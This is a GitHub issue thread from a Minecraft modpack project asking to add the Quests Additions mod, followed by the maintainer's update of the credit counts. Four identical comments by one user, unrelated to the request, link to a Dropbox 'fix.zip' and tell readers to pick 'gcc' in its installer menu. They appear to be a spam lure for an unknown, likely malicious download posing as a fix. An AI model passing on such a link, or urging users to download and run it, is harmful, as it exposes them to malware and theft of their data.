### ISSUE TITLE
[MOD] Add Quests Additions

### ISSUE THREAD

**Issue by kkempfer** [kkempfer/Create-Survive-Explore#136]
### CurseForge URL

https://www.curseforge.com/minecraft/mc-mods/quests-additions-fabric

### Why should we add this mod in this modpack?

Adds some tasks and rewards (currently 7 tasks and 3 rewards) that are missing in the base mod.

### Additional details

Confirm if the additions are usefull for our needs.

### Confirm

- [X] This is not a mod update request. For that purpose, I should use the mod update form.
- [X] This is not a mod removal request. For that purpose, I should use the mod removal form.

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by kkempfer** [comment]
Updated credits counts:

* Developers of [Fabric mod loader](https://fabricmc.net/)
* Developers of 205 mods. Removed 17 mods (1 cited in #121, 1 in #116, 1 in #85, 2 in #67, 12 in #13). See MODSLIST.md
* Developers of 14 resource packs. See RESOURCEPACKSLIST.md
* Developers of 4 data packs. See DATAPACKSLIST.md
* Developer of [Complementary Shaders - Unbound](https://www.curseforge.com/minecraft/shaders/complementary-unbound)
